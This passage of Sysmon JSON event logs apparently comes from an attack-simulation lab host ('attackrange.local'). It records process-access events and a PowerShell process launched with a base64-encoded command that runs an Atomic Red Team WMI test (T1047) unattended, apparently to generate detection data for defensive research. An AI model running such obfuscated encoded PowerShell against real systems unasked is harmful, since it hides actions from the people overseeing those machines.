ws\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.768\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.768","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.783\r\nProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_34ak22kn.frp.ps1\r\nCreationUtcTime: 2020-08-01 07:59:12.783","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.783","ProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_34ak22kn.frp.ps1","CreationUtcTime":"2020-08-01 07:59:12.783","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.815\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.815","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.815\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.815","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.144\r\nProcessGuid: {41C8662E-20D1-5F25-0000-001014350800}\r\nProcessId: 5036\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.144","ProcessGuid":"{41C8662E-20D1-5F25-0000-001014350800}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001014350800}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66ed2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663746a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6637423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\